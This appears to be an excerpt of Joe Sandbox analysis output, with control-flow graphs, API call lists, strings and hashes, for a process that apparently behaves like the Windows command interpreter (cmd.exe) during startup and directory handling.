                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileFindFirstLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 873889042-0
                                                                                                  • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                  • Instruction ID: b32cb9b1789d78b8746b107b373b1966d490181b8ff92c530f75a6c4013879fa
                                                                                                  • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                  • Instruction Fuzzy Hash: 67516179A09B42D6E710AF12E4541B9FBA0FB49B92FE48575CA1D43B60CFBCE854C720

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1142 7ff7823e2978-7ff7823e29b6 1143 7ff7823e29b9-7ff7823e29c1 1142->1143 1143->1143 1144 7ff7823e29c3-7ff7823e29c5 1143->1144 1145 7ff7823ee441 1144->1145 1146 7ff7823e29cb-7ff7823e29cf 1144->1146 1147 7ff7823e29d2-7ff7823e29da 1146->1147 1148 7ff7823e29dc-7ff7823e29e1 1147->1148 1149 7ff7823e2a1e-7ff7823e2a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff7823e29e3-7ff7823e29eb 1148->1150 1151 7ff7823ee435-7ff7823ee439 1149->1151 1152 7ff7823e2a44-7ff7823e2a5c FindClose 1149->1152 1150->1147 1153 7ff7823e29ed-7ff7823e2a1c call 7ff7823e8f80 1150->1153 1151->1145 1154 7ff7823e2ae3-7ff7823e2ae5 1152->1154 1155 7ff7823e2a62-7ff7823e2a6e 1152->1155 1156 7ff7823e2aeb-7ff7823e2b10 _wcsnicmp 1154->1156 1157 7ff7823ee3f7-7ff7823ee3ff 1154->1157 1159 7ff7823e2a70-7ff7823e2a78 1155->1159 1156->1155 1160 7ff7823e2b16-7ff7823ee3f1 _wcsicmp 1156->1160 1159->1159 1162 7ff7823e2a7a-7ff7823e2a8d 1159->1162 1160->1155 1160->1157 1162->1145 1164 7ff7823e2a93-7ff7823e2a97 1162->1164 1165 7ff7823ee404-7ff7823ee407 1164->1165 1166 7ff7823e2a9d-7ff7823e2ade memmove call 7ff7823e13e0 1164->1166 1168 7ff7823ee40b-7ff7823ee413 1165->1168 1166->1150 1168->1168 1170 7ff7823ee415-7ff7823ee42b memmove 1168->1170 1170->1151
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                  • Instruction ID: cf0fda47ae1fcaca37bf2931e3d9f99129344a985fc304028f76123f4d90d015
                                                                                                  • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                  • Instruction Fuzzy Hash: 51516D25B0868195EB30AF15E5142BAE690FB54BA1FE44239DE6D07FD0DF7CE449C710

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 643 7ff7823e4d5c-7ff7823e4e4b InitializeCriticalSection call 7ff7823e58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7823e0580 call 7ff7823e4a14 call 7ff7823e4ad0 call 7ff7823e5554 GetCommandLineW 654 7ff7823e4e4d-7ff7823e4e54 643->654 654->654 655 7ff7823e4e56-7ff7823e4e61 654->655 656 7ff7823e51cf-7ff7823e51e3 call 7ff7823d3278 call 7ff7823e4c1c 655->656 657 7ff7823e4e67-7ff7823e4e7b call 7ff7823e2e44 655->657 662 7ff7823e4e81-7ff7823e4ec3 GetCommandLineW call 7ff7823e13e0 call 7ff7823dca40 657->662 663 7ff7823e51ba-7ff7823e51ce call 7ff7823d3278 call 7ff7823e4c1c 657->663 662->663 674 7ff7823e4ec9-7ff7823e4ee8 call 7ff7823e417c call 7ff7823e2394 662->674 663->656 678 7ff7823e4eed-7ff7823e4ef5 674->678 678->678 679 7ff7823e4ef7-7ff7823e4f1f call 7ff7823daa54 678->679 682 7ff7823e4f95-7ff7823e4fee GetConsoleOutputCP GetCPInfo call 7ff7823e51ec GetProcessHeap HeapAlloc 679->682 683 7ff7823e4f21-7ff7823e4f30 679->683 689 7ff7823e4ff0-7ff7823e5006 GetConsoleTitleW 682->689 690 7ff7823e5012-7ff7823e5018 682->690 683->682 684 7ff7823e4f32-7ff7823e4f39 683->684 684->682 686 7ff7823e4f3b-7ff7823e4f77 call 7ff7823d3278 GetWindowsDirectoryW 684->686 696 7ff7823e51b1-7ff7823e51b9 call 7ff7823e4c1c 686->696 697 7ff7823e4f7d-7ff7823e4f90 call 7ff7823e3c24 686->697 689->690 694 7ff7823e5008-7ff7823e500f 689->694 691 7ff7823e507a-7ff7823e507e 690->691 692 7ff7823e501a-7ff7823e5024 call 7ff7823e3578 690->692 698 7ff7823e5080-7ff7823e50b3 call 7ff7823fb89c call 7ff7823d586c call 7ff7823d3240 call 7ff7823e3448 691->698 699 7ff7823e50eb-7ff7823e5161 GetModuleHandleW GetProcAddress * 3 691->699 692->691 706 7ff7823e5026-7ff7823e5030 692->706 694->690 696->663 697->682 724 7ff7823e50b5-7ff7823e50d0 call 7ff7823e3448 * 2 698->724 725 7ff7823e50d2-7ff7823e50d7 call 7ff7823d3278 698->725 704 7ff7823e5163-7ff7823e5167 699->704 705 7ff7823e516f 699->705 704->705 709 7ff7823e5169-7ff7823e516d 704->709 710 7ff7823e5172-7ff7823e51af free call 7ff7823e8f80 705->710 712 7ff7823e5075 call 7ff7823fcff0 706->712 713 7ff7823e5032-7ff7823e5059 GetStdHandle GetConsoleScreenBufferInfo 706->713 709->705 709->710 712->691 716 7ff7823e505b-7ff7823e5067 713->716 717 7ff7823e5069-7ff7823e5073 713->717 716->691 717->691 717->712 729 7ff7823e50dc-7ff7823e50e6 GlobalFree 724->729 725->729 729->699
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4D9A
                                                                                                    • Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF
                                                                                                  • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DBB
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E4DCA
                                                                                                  • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DE0
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823E4DEE
                                                                                                  • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E04
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0589
                                                                                                    • Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E059E
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05AF
                                                                                                    • Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E05C5
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05EF
                                                                                                    • Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E0605
                                                                                                    • Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0632
                                                                                                    • Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E0647
                                                                                                    • Part of subcall function 00007FF7823E4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
                                                                                                    • Part of subcall function 00007FF7823E4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
                                                                                                    • Part of subcall function 00007FF7823E4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
                                                                                                    • Part of subcall function 00007FF7823E4A14: memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
                                                                                                    • Part of subcall function 00007FF7823E4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2
                                                                                                    • Part of subcall function 00007FF7823E4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AD6
                                                                                                    • Part of subcall function 00007FF7823E4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AEF
                                                                                                    • Part of subcall function 00007FF7823E5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E55DA
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5623
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5667
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E56BE
                                                                                                    • Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5702
                                                                                                  • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E35
                                                                                                  • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E81
                                                                                                  • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F69
                                                                                                  • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F95
                                                                                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FB0
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FC1
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FD8
                                                                                                  • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FF8
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5037
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E504B
                                                                                                  • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50DF
                                                                                                  • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50F2
                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E510F
                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5130
                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E514A
                                                                                                  • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5175
                                                                                                    • Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                    • Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                    • Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                    • Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                    • Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                    • Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                  • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                  • API String ID: 1049357271-3021193919
                                                                                                  • Opcode ID: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
                                                                                                  • Instruction ID: e2b4de068f5b9bd485b54334b7b7e689d55a2f88eac40b734f7ceb225c21face
                                                                                                  • Opcode Fuzzy Hash: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
                                                                                                  • Instruction Fuzzy Hash: ACC17A65A08B4296EA44BB11E814179FBA0FF89B53FE44178D90E07B55DFBCE849C330

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 732 7ff7823e3c24-7ff7823e3c61 733 7ff7823eec5a-7ff7823eec5f 732->733 734 7ff7823e3c67-7ff7823e3c99 call 7ff7823daf14 call 7ff7823dca40 732->734 733->734 736 7ff7823eec65-7ff7823eec6a 733->736 743 7ff7823e3c9f-7ff7823e3cb2 call 7ff7823db900 734->743 744 7ff7823eec97-7ff7823eeca1 call 7ff7823e855c 734->744 738 7ff7823e412e-7ff7823e415b call 7ff7823e8f80 736->738 743->744 749 7ff7823e3cb8-7ff7823e3cbc 743->749 750 7ff7823e3cbf-7ff7823e3cc7 749->750 750->750 751 7ff7823e3cc9-7ff7823e3ccd 750->751 752 7ff7823e3cd2-7ff7823e3cd8 751->752 753 7ff7823e3ce5-7ff7823e3d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7823e3cda-7ff7823e3cdf 752->754 756 7ff7823e3fb8 753->756 757 7ff7823e3d68-7ff7823e3d6c 753->757 754->753 755 7ff7823e3faa-7ff7823e3fb3 754->755 755->752 759 7ff7823e3fc6-7ff7823e3fec GetLastError call 7ff7823e855c call 7ff7823ea5d6 756->759 757->756 758 7ff7823e3d72-7ff7823e3dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7823e3dd3-7ff7823e3ddd 758->760 763 7ff7823e3ff1-7ff7823e4007 call 7ff7823e855c _local_unwind 759->763 762 7ff7823e3de3-7ff7823e3dfb 760->762 760->763 765 7ff7823e3e01-7ff7823e3e11 762->765 766 7ff7823e40fe-7ff7823e4119 call 7ff7823e855c _local_unwind 762->766 774 7ff7823e400c-7ff7823e4022 GetLastError 763->774 765->766 770 7ff7823e3e17-7ff7823e3e28 765->770 775 7ff7823e411a-7ff7823e412c call 7ff7823dff70 call 7ff7823e855c 766->775 773 7ff7823e3e2c-7ff7823e3e34 770->773 773->773 776 7ff7823e3e36-7ff7823e3e3f 773->776 777 7ff7823e3e95-7ff7823e3e9c 774->777 778 7ff7823e4028-7ff7823e402b 774->778 775->738 783 7ff7823e3e42-7ff7823e3e55 776->783 780 7ff7823e3ecf-7ff7823e3ed3 777->780 781 7ff7823e3e9e-7ff7823e3ec2 call 7ff7823e2978 777->781 778->777 779 7ff7823e4031-7ff7823e4047 call 7ff7823e855c _local_unwind 778->779 799 7ff7823e404c-7ff7823e4062 call 7ff7823e855c _local_unwind 779->799 788 7ff7823e3ed5-7ff7823e3ef7 GetFileAttributesW 780->788 789 7ff7823e3f08-7ff7823e3f0b 780->789 793 7ff7823e3ec7-7ff7823e3ec9 781->793 784 7ff7823e3e66-7ff7823e3e8f GetFileAttributesW 783->784 785 7ff7823e3e57-7ff7823e3e60 783->785 784->774 784->777 785->784 791 7ff7823e3f9d-7ff7823e3fa5 785->791 794 7ff7823e3efd-7ff7823e3f02 788->794 795 7ff7823e4067-7ff7823e4098 GetLastError call 7ff7823e855c _local_unwind 788->795 797 7ff7823e3f1e-7ff7823e3f40 SetCurrentDirectoryW 789->797 798 7ff7823e3f0d-7ff7823e3f11 789->798 791->783 793->780 793->799 794->789 801 7ff7823e409d-7ff7823e40b3 call 7ff7823e855c _local_unwind 794->801 795->801 804 7ff7823e3f46-7ff7823e3f69 call 7ff7823e498c 797->804 805 7ff7823e40b8-7ff7823e40de GetLastError call 7ff7823e855c _local_unwind 797->805 803 7ff7823e3f13-7ff7823e3f1c 798->803 798->804 799->795 801->805 803->797 803->804 815 7ff7823e40e3-7ff7823e40f9 call 7ff7823e855c _local_unwind 804->815 816 7ff7823e3f6f-7ff7823e3f98 call 7ff7823e417c 804->816 805->815 815->766 816->775
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                  • String ID: :
                                                                                                  • API String ID: 1809961153-336475711
                                                                                                  • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                  • Instruction ID: eea14582b966939e525daddcb7a96133027dc7a1bd3874831c9cbf8c375002a0
                                                                                                  • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                  • Instruction Fuzzy Hash: 74D1943660CB85A1EA60EB15E4642B9F7A1FB84742FD04179DA4E43FA4DFBCE449C720

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 914 7ff7823e2394-7ff7823e2416 memset call 7ff7823dca40 917 7ff7823ee0d2-7ff7823ee0da call 7ff7823e4c1c 914->917 918 7ff7823e241c-7ff7823e2453 GetModuleFileNameW call 7ff7823e081c 914->918 923 7ff7823ee0db-7ff7823ee0ee call 7ff7823e498c 917->923 918->923 924 7ff7823e2459-7ff7823e2468 call 7ff7823e081c 918->924 929 7ff7823ee0f4-7ff7823ee107 call 7ff7823e498c 923->929 924->929 930 7ff7823e246e-7ff7823e247d call 7ff7823e081c 924->930 937 7ff7823ee10d-7ff7823ee123 929->937 935 7ff7823e2483-7ff7823e2492 call 7ff7823e081c 930->935 936 7ff7823e2516-7ff7823e2529 call 7ff7823e498c 930->936 935->937 944 7ff7823e2498-7ff7823e24a7 call 7ff7823e081c 935->944 936->935 941 7ff7823ee125-7ff7823ee139 wcschr 937->941 942 7ff7823ee13f-7ff7823ee17a _wcsupr 937->942 941->942 945 7ff7823ee27c 941->945 946 7ff7823ee181-7ff7823ee199 wcsrchr 942->946 947 7ff7823ee17c-7ff7823ee17f 942->947 955 7ff7823ee2a1-7ff7823ee2c3 _wcsicmp 944->955 956 7ff7823e24ad-7ff7823e24c5 call 7ff7823e3c24 944->956 949 7ff7823ee283-7ff7823ee29b call 7ff7823e498c 945->949 950 7ff7823ee19c 946->950 947->950 949->955 953 7ff7823ee1a0-7ff7823ee1a7 950->953 953->953 954 7ff7823ee1a9-7ff7823ee1bb 953->954 958 7ff7823ee264-7ff7823ee277 call 7ff7823e1300 954->958 959 7ff7823ee1c1-7ff7823ee1e6 954->959 964 7ff7823e24ca-7ff7823e24db 956->964 958->945 962 7ff7823ee21a 959->962 963 7ff7823ee1e8-7ff7823ee1f1 959->963 969 7ff7823ee21d-7ff7823ee21f 962->969 965 7ff7823ee1f3-7ff7823ee1f6 963->965 966 7ff7823ee201-7ff7823ee210 963->966 967 7ff7823e24dd-7ff7823e24e4 ??_V@YAXPEAX@Z 964->967 968 7ff7823e24e9-7ff7823e2514 call 7ff7823e8f80 964->968 965->966 970 7ff7823ee1f8-7ff7823ee1ff 965->970 966->962 971 7ff7823ee212-7ff7823ee218 966->971 967->968 969->949 973 7ff7823ee221-7ff7823ee228 969->973 970->965 970->966 971->969 975 7ff7823ee254-7ff7823ee262 973->975 976 7ff7823ee22a-7ff7823ee231 973->976 975->945 977 7ff7823ee234-7ff7823ee237 976->977 977->975 978 7ff7823ee239-7ff7823ee242 977->978 978->975 979 7ff7823ee244-7ff7823ee252 978->979 979->975 979->977
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                  • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                  • API String ID: 2622545777-4197029667
                                                                                                  • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                  • Instruction ID: cb338761042c7bd0f67f347705d5db74958590520d1d20d3bb95bcab9aeff1ba
                                                                                                  • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                  • Instruction Fuzzy Hash: 7891B325B1964295EE64BF11D8602F8A7A0FF48B96FE44179C90E07E95DFBCE948C330

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleMode_get_osfhandle
                                                                                                  • String ID: CMD.EXE
                                                                                                  • API String ID: 1606018815-3025314500
                                                                                                  • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                  • Instruction ID: a74c0930e76aad206f73b3067b884e16ca9d25f029c008ff24f959ef251b67dd
                                                                                                  • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                  • Instruction Fuzzy Hash: 90410E35A09602DBE7446B15E854178BFA0FB8A753FF89178C91E477A4DFBCA848C630

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
